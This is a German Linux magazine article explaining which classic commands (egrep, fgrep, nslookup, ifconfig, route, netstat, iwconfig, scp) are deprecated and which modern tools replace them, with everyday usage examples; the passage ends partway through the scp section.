<p>Linux entwickelt sich laufend weiter und damit auch die Werkzeuge, die seine Fans tagtäglich nutzen. Manche der Klassiker wie das durch <em>nftables </em>ersetzte <em>iptables </em>sind inzwischen aber nicht nur überholt, sondern auch potenziell <strong>unsicher </strong>oder <strong>ineffizient</strong>. </p>



<p>Dabei sind sie noch in vielen Linux-Büchern und auf zahlreichen Webseiten beschrieben. Das verleitet Anwender dazu, sie weiterhin zu einzusetzen. Einige dieser veralteten Befehle finden Sie auch in unseren bereits viele Jahre alten Ratgebern <a href="https://www.pcwelt.de/article/1150969/die-10-wichtigsten-linux-befehle-fuer-netzwerk-und-internet.html" target="_blank" rel="noreferrer noopener">Die 10 wichtigsten Linux-Befehle für Netzwerk und Internet</a> und <a href="https://www.pcwelt.de/article/1149090/die_10_wichtigsten_linux-befehle_fuer_einsteiger-kommandozeile_alias_terminal.html" target="_blank" rel="noreferrer noopener">Die 10 wichtigsten Linux-Befehle für Einsteiger.</a></p>



<p>In diesem Artikel stellen wir die am häufigsten noch anzutreffenden „<em>deprecated</em>“, also veralteten, Linux-Kommandos vor. Vielen Anwendern dürften sie noch vertraut sein. Sie sind aber den eben genannten Gründen nicht mehr zeitgemäß, weil sie nicht geschlossene Sicherheitslücken aufweisen, Funktionen unvollständig sind oder es effizientere Alternativen gibt.</p>



<p>Manche der alten Befehle wurden schon aus den aktuellen Distributionen entfernt. Andere sind aber immer noch enthalten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6907099478664"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_1.jpg?quality=50&amp;strip=all" alt="Das Netfilter-Projekt kümmert sich nicht nur um den Klassiker iptables, sondern ebenso um den Nachfolger nftables, der auch die Befehle ip6tables, arptables und ebtables ersetzt." class="wp-image-2948156" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_1.jpg?quality=50&amp;strip=all 900w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_1.jpg?resize=300%2C200&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_1.jpg?resize=768%2C514&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_1.jpg?resize=150%2C100&amp;quality=50&amp;strip=all 150w" width="900" height="602" sizes="auto, (max-width: 900px) 100vw, 900px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Das Netfilter-Projekt kümmert sich nicht nur um den Klassiker iptables, sondern ebenso um den Nachfolger nftables, der auch die Befehle ip6tables, arptables und ebtables ersetzt.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>So hat etwa der Softwareentwickler und Systemadministrator Jose Vicente Nunez für das Blog von Red Hat <a href="https://www.redhat.com/en/blog/deprecated-linux-command-replacements">eine Liste mit Linux-Kommandos erstellt, die nicht mehr genutzt werden sollten</a>. </p>



<p>Dafür nennt er auch Alternativen, die nach seiner Ansicht mindestens den gleichen Funktionsumfang bieten, trotzdem meist leistungsfähiger sind und zudem immer noch aktiv gepflegt werden.</p>



<h2 class="wp-block-heading toc">egrep und fgrep</h2>



<p>Als erste Beispiele nennt Nunez die Befehle <strong>egrep </strong>und <strong>fgrep</strong>. Sie basieren auf dem Tool grep, das gezielt nach Textmustern in Dateien oder Eingaben sucht. Sowohl egrep als auch fgrep werden aber nicht mehr weiterentwickelt, weil sie mittlerweile als zusätzliche Parameter in grep integriert wurden.</p>



<p>Anstelle des eigenständigen Befehls egrep, der erweiterte reguläre Ausdrücke nutzt, um das gewünschte Muster zu finden, können Sie jetzt </p>



<pre class="wp-block-code"><code>grep -E</code></pre>



<p>verwenden. So lassen sich komplexere Muster und Sonderzeichen einsetzen, ohne sie extra maskieren zu müssen. </p>



<p>Ähnlich wurde fgrep ersetzt, das nach festen, also unveränderten Text-Strings sucht und dadurch Zeit spart. Der Befehl fgrep entspricht heute im Wesentlichen </p>



<pre class="wp-block-code"><code>grep -F</code></pre>



<p>In neueren Distributionen sind sowohl egrep als auch fgrep lediglich symbolische Links auf grep.</p>



<h2 class="wp-block-heading toc">nslookup</h2>



<p>Auch das Kommando <strong>nslookup </strong>ist nicht mehr ganz auf der Höhe der Zeit. Es wurde und wird auch heute noch häufig genutzt, um DNS-Anfragen (Domain Name System) durchzuführen. </p>



<p>So lässt sich damit zum Beispiel per Forward Lookup die IP-Adresse zu einer Domain oder umgekehrt per Reverse Lookup der Domainname zu einer IP-Adresse herausfinden. </p>



<p>Außerdem kann man mit nslookup gezielt verschiedene DNS-Server abfragen, DNS-Einträge überprüfen oder Fehler bei der Namensauflösung diagnostizieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"69070994790f7"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_2.jpg?quality=50&amp;strip=all" alt="Der dig-Befehl informiert hier darüber, dass de.wikipedia.org ein anderer Name für dyna.wikimedia.org ist, zeigt die zugehörige IP-Adresse an und liefert damit einen schnellen Überblick über die DNS-Zuordnung." class="wp-image-2948158" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_2.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_2.jpg?resize=300%2C205&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_2.jpg?resize=768%2C525&amp;quality=50&amp;strip=all 768w" width="800" height="547" sizes="auto, (max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Der dig-Befehl informiert hier darüber, dass de.wikipedia.org ein anderer Name für dyna.wikimedia.org ist, zeigt die zugehörige IP-Adresse an und liefert damit einen schnellen Überblick über die DNS-Zuordnung.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Die Entscheidung, nslookup nicht mehr weiterzuentwickeln, wurde zwar schon 2004 widerrufen. Nunez und viele andere empfehlen trotzdem, auf die Befehle</p>



<pre class="wp-block-code"><code>dig</code></pre>



<p>und </p>



<pre class="wp-block-code"><code>host </code></pre>



<p>umzusteigen. </p>



<p>Beispielsweise dig ist Teil der BIND-DNS-Tools, wird aktiv gepflegt und kann daher mittlerweile mehr als nslookup. </p>



<p>Der Name ist eines der Wortspiele, wie sie die Open-Source-Community liebt. Einerseits lässt sich der englische Begriff „to dig“ im Deutschen mit „ausgraben“ übersetzen, andererseits ist es auch die Abkürzung für „domain information groper“ (grob übersetzt: „Domain-Informationen-Grapscher“).</p>



<p>Dig unterstützt DNSSEC, kann gezielte Abfragen aller Record-Typen durchführen, liefert strukturierte und gut lesbare Ausgaben und bietet damit auch bei komplexen Anfragen eine höhere Flexibilität. </p>



<p>Außerdem greift nslookup anders als dig nicht auf die lokale Domain-Name-System-Resolver-Bibliothek des Betriebssystems zurück, um Abfragen durchzuführen. Dadurch kann es vorkommen, dass nslookup andere Ergebnisse liefert als dig, wenn etwa die Resolver-Bibliothek zusätzliche „hosts“-Dateien beachtet oder einen lokalen Cache verwendet.</p>



<h2 class="wp-block-heading toc">ifconfig, route und netstat</h2>



<p>Zu den bekanntesten mittlerweile nicht mehr ganz zeitgemäßen Tools gehört der Befehl <strong>ifconfig</strong>. Wenn das Programm ohne Parameter verwendet wird, zeigt es die aktuelle Netzwerkkonfiguration. Es kann aber auch genutzt werden, um zusammen mit Angaben zu Serveradresse, Gateway, Netzmaske oder IP-Adresse den Netzwerkadapter zu konfigurieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6907099479bcd"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_3.jpg?quality=50&amp;strip=all" alt="Der Linux-Befehl ifconfig gehört zu den beliebtesten Relikten aus der Vergangenheit, die Alternative ip bietet aber weit mehr Möglichkeiten und Funktionen, um Netzwerkinterfaces, IP-Adressen und Routing präzise zu verwalten." class="wp-image-2948161" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_3.jpg?quality=50&amp;strip=all 934w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_3.jpg?resize=300%2C196&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_3.jpg?resize=768%2C501&amp;quality=50&amp;strip=all 768w" width="934" height="609" sizes="auto, (max-width: 934px) 100vw, 934px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Der Linux-Befehl ifconfig gehört zu den beliebtesten Relikten aus der Vergangenheit, die Alternative ip bietet aber weit mehr Möglichkeiten und Funktionen, um Netzwerkinterfaces, IP-Adressen und Routing präzise zu verwalten.</p></figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Die meisten Distributionen liefern ifconfig immer noch mit. Dabei sollte der Befehl bereits vor Jahren durch die Alternative </p>



<pre class="wp-block-code"><code>ip</code></pre>



<p>aus der iproute2-Familie ersetzt werden. </p>



<p>Auf den ersten Blick wirkt ip komplizierter als ifconfig, da etwa zum Anzeigen der aktuellen IP-Adresse ein Befehl wie „ip addr show“ erforderlich ist. Dafür informiert ip mit einem Befehl wie</p>



<pre class="wp-block-code"><code>ip link show</code></pre>



<p>über die Netzwerkinterfaces, also etwa echte oder virtuelle Netzwerkkarten und WLAN-Adapter.</p>



<p>Weitere Beispiele für die Verwendung des ip-Befehls:</p>



<pre class="wp-block-code"><code>ip link set eth0 up</code></pre>



<p>Aktiviert das Netzwerkinterface „eth0“.</p>



<pre class="wp-block-code"><code>ip link set eth0 down</code></pre>



<p>Deaktiviert das Netzwerkinterface „eth0“ wieder.</p>



<pre class="wp-block-code"><code>ip addr show dev eth0</code></pre>



<p>Zeigt die IP-Adresse des Netzwerkinterfaces „eth0“.</p>



<pre class="wp-block-code"><code>ip link show dev eth0</code></pre>



<p>Zeigt die Details des Netzwerkinterfaces „eth0“.</p>



<pre class="wp-block-code"><code>ip addr del 192.168.0.77/24 dev eth0</code></pre>



<p>Dieser Befehl steht zum Beispiel nur mit ip zur Verfügung. Er löscht die angegebene IP-Adresse für das Interface „eth0“. Neben solchen Aufgaben informiert ip auch über die Routingtabelle:</p>



<pre class="wp-block-code"><code>ip route show</code></pre>



<p>oder</p>



<pre class="wp-block-code"><code>ip route list</code></pre>



<p>Hier zeigt der ip-Befehl die Routingtabelle und ersetzt somit auch gleich noch den Route-Befehl. So zeigt das Kommando „route -n“ die Adressen zwar in einer tabellarischen Form an, allerdings nur numerisch und ohne DNS-Auflösung. Die Ausgabe von „ip route show“ oder „ip route list“ ist dagegen weit kompakter und enthält zusätzliche Informationen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"690709947a566"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_4.jpg?quality=50&amp;strip=all" alt="Der Befehl ip erscheint zunächst komplizierter als ifconfig, informiert aber zum Beispiel ausführlicher über die verschiedenen Netzwerklayer und erlaubt eine präzisere Steuerung und Analyse der Netzwerkkonfiguration." class="wp-image-2948206" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_4.jpg?quality=50&amp;strip=all 934w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_4.jpg?resize=300%2C205&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_4.jpg?resize=768%2C525&amp;quality=50&amp;strip=all 768w" width="934" height="639" sizes="auto, (max-width: 934px) 100vw, 934px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Der Befehl ip erscheint zunächst komplizierter als ifconfig, informiert aber zum Beispiel ausführlicher über die verschiedenen Netzwerklayer und erlaubt eine präzisere Steuerung und Analyse der Netzwerkkonfiguration.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Ein weiteres Netzwerkkommando, das in diesem Fall durch den Befehl </p>



<pre class="wp-block-code"><code>ss </code></pre>



<p>(die Abkürzung steht für „Sockets Statistics“) ersetzt wurde, ist <strong>netstat</strong>. Das Werkzeug zeigt zum Beispiel die Liste der aktiven Netzwerkverbindungen. Ein Beispiel:</p>



<pre class="wp-block-code"><code>netstat --numeric --tcp --listen</code></pre>



<p>Der Befehl listet die aktiven TCP-Verbindungen ohne Namensauflösung auf. Das ss-Äquivalent lautet:</p>



<pre class="wp-block-code"><code>ss --numeric --tcp --listen</code></pre>



<p>Der Befehl ss ist ebenfalls Teil des iproute2-Pakets und ersetzt auf modernen Systemen netstat, da er mehr Details anzeigen kann und unter anderem auch schneller startet. </p>



<p>Während sich netstat Informationen aus den „/proc“-Dateien holt, greift ss direkt auf den Kernel zu. Im Gegensatz zu netstat, das zu den nicht mehr aktiv gepflegten nettools gehört, wird ss kontinuierlich weiterentwickelt und an moderne Betriebssysteme und Protokolle angepasst.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"690709947ac92"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_5.jpg?quality=50&amp;strip=all" alt="Die Befehle netstat und ss listen beide die aktiven TCP-Verbindungen ohne Namensauflösung auf. ss arbeitet dabei direkt mit dem Kernel und liefert daher zusätzliche Details zu Sockets." class="wp-image-2948208" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_5.jpg?quality=50&amp;strip=all 934w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_5.jpg?resize=300%2C185&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_5.jpg?resize=768%2C473&amp;quality=50&amp;strip=all 768w" width="934" height="575" sizes="auto, (max-width: 934px) 100vw, 934px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Die Befehle netstat und ss listen beide die aktiven TCP-Verbindungen ohne Namensauflösung auf. ss arbeitet dabei direkt mit dem Kernel und liefert daher zusätzliche Details zu Sockets.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Der Befehl „ss“ ohne weitere Parameter gibt eine Liste aller Netzwerkverbindungen aus. </p>



<p>Zu den Stärken des Befehls gehört außerdem, dass er Verbindungen nach verschiedenen Kriterien filtern kann. So listet etwa „ss -t“ nur TCP-Verbindungen auf, während „ss -u“ dasselbe mit UDP-Verbindungen macht. Um etwa anzuzeigen, welche Prozesse auf das Netzwerk zugreifen, verwenden Sie den Befehl „ss -p“.</p>



<h2 class="wp-block-heading toc">iwconfig</h2>



<p>Ein weiterer Netzwerkbefehl, der mittlerweile aus guten Gründen als veraltet gilt, ist <strong>iwconfig</strong>. Er ähnelt ifconfig, ist aber auf Wireless-Adapter ausgelegt. In einigen Distributionen wie Ubuntu ist er noch zu finden. Andere wie Red Hat haben ihn jedoch bereits entfernt und mit dem neueren Befehl </p>



<pre class="wp-block-code"><code>iw </code></pre>



<p>ersetzt.</p>



<p>Denn iwconfig deckt viele aktuelle WLAN-Funktionen nicht ab und unterstützt moderne Standards wie 802.11ac oder 802.11ax nicht mehr zuverlässig. </p>



<p>Iw wird hingegen aktiv weiterentwickelt, liefert detaillierte Informationen über Netzwerkkarten, Signalstärken, Frequenzen und Kanäle, erlaubt komplexe Konfigurationen und unterstützt alle aktuellen WLAN-Standards sowie neue Funktionen wie Mesh-Netzwerke oder WPA3.</p>



<h2 class="wp-block-heading toc">scp</h2>



<p>Das Kommando <strong>scp </strong>ist ein weiterer Klassiker, dessen Nutzung mittlerweile aber nicht mehr empfohlen wird. Zu seinen Stärken gehört, dass es dem bekannten cp-Befehl ähnelt, mit dem sich Dateien und Verzeichnisse lokal auf einem Rechner kopieren lassen. </p>



<p>Scp dient dagegen dazu, Daten mit SSH (Secure Shell) verschlüsselt über das Netzwerk zu übertragen. Zusätzlich zu cp enthält scp auch Funktionen zur Authentifizierung mit Passwort oder per SSH-Schlüssel.</p>



<p>Beispielsweise kopiert der Befehl</p>



<pre class="wp-block-code"><code>cp Bericht.txt /home/user/backup/</code></pre>



<p>Die Datei „Bericht.txt“ aus dem aktuellen Verzeichnis in einen Backupordner. Bei scp würde das so aussehen:</p>



<pre class="wp-block-code"><code>scp Bericht.txt user@server:/home/user/</code></pre>



<p>Statt nur einen lokalen Pfad anzugeben, sind bei scp noch ein paar zusätzliche Angaben nötig. So ist „user“ der Benutzer auf dem entfernten System, „server“ dessen Adresse und „/home/user“ der Pfad in das Verzeichnis, in das die Datei „Bericht.txt“ übertragen werden soll. </p>



<p>Ein weiterer Unterschied ist, dass die Übertragung erst nach der Eingabe des richtigen Passworts erfolgt. Bei beiden Varianten ist es übrigens zusätzlich möglich, an den Pfad noch einen Dateinamen anzuhängen. Die Kommandos ändern den ursprünglichen Dateinamen dann in den neu angegebenen.</p>



<p>In dem Beitrag “<a href="https://lwn.net/Articles/835962/">Deprecating scp</a>” beschreibt der Autor Jonathan Corbet die wichtigsten Gründe, warum scp nicht mehr weiterentwickelt wird. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"690709947b822"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_7_a851bb.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Jonathan Corbet erläutert auf LWN.net die Gründe, warum auch langjährige scp-Nutzer das Programm nicht mehr zur Übertragung von Dateien über das Netzwerk nutzen sollten." class="wp-image-2948254" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_7_a851bb.jpg?quality=50&amp;strip=all 1506w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_7_a851bb.jpg?resize=300%2C213&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_7_a851bb.jpg?resize=768%2C546&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_7_a851bb.jpg?resize=1200%2C853&amp;quality=50&amp;strip=all 1200w" width="1200" height="853" sizes="auto, (max-width: 1200px) 100vw, 1200px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Jonathan Corbet erläutert auf LWN.net die Gründe, warum auch langjährige scp-Nutzer das Programm nicht mehr zur Übertragung von Dateien über das Netzwerk nutzen sollten.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>So basiert scp auf dem veralteten rcp-Protokoll, das heute als unsicher eingestuft wird. Ein weiteres Problem ist laut Corbet die Methodik, mit der scp Argumente übergibt. Dies könne zur unbeabsichtigten Ausführung von Befehlen führen, insbesondere auf Systemen, auf denen der Zugriff eigentlich auf das reine Kopieren von Daten per scp beschränkt ist. </p>



<p>Red Hat und Fedora haben sich daher 2022 entschieden, das alte SCP-Protokoll nicht mehr standardmäßig zu unterstützen. Der Befehl scp ist weiterhin verfügbar, nutzt aber intern nun standardmäßig das sicherere SFTP-Protokoll (je nach Interpretation steht die Abkürzung für „Secure File Transfer Protocol“ oder „SSH File Transfer Protocol“), während der Verweis auf das ursprüngliche SCP-Protokoll entfernt wurde. </p>



<p>Als Begründung nennt Dmitry Belyavskiy, Senior Software Engineer bei Red Hat, dass das SCP-Protokoll bereits Jahrzehnte alt ist und zahlreiche Sicherheitsrisiken und Probleme aufweist, für die es keine einfachen Lösungen gibt.</p>



<p>Die Änderung wurde unter Beteiligung von Jakub Jelen programmiert, der unter anderem mehrere Jahre als Maintainer für das Open-SSH-Paket aktiv war. Vorsichtshalber wurde jedoch noch eine Art Hintertür eingebaut. </p>



<p>So gibt es nun den neuen scp-Schalter „-O“, der das alte SCP-Protokoll wieder aktiviert. Er dürfte aber in einer der kommenden Red-Hat-Releases wieder entfernt werden. Seine Nutzung wird daher nicht empfohlen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"690709947beca"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_6.jpg?quality=50&amp;strip=all" alt="Mit der Veröffentlichung von RHEL 9 hat sich Red Hat entschieden, scp zwar noch nicht ganz zu entfernen, aber das dahinter liegende Protokoll trotzdem mit SFTP zu ersetzen." class="wp-image-2948217" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_6.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_6.jpg?resize=300%2C177&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/10/alternativen_fuer_veraltete_kommandos_6.jpg?resize=768%2C453&amp;quality=50&amp;strip=all 768w" width="800" height="472" sizes="auto, (max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Mit der Veröffentlichung von RHEL 9 hat sich Red Hat entschieden, scp zwar noch nicht ganz zu entfernen, aber das dahinter liegende Protokoll trotzdem mit SFTP zu ersetzen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Sinnvoller dürfte es deswegen meist sein, gleich auf die Alternativen </p>



<pre class="wp-block-code"><code>rsync</code></pre>



<p>oder </p>



<pre class="wp-block-code"><code>sftp </code></pre>



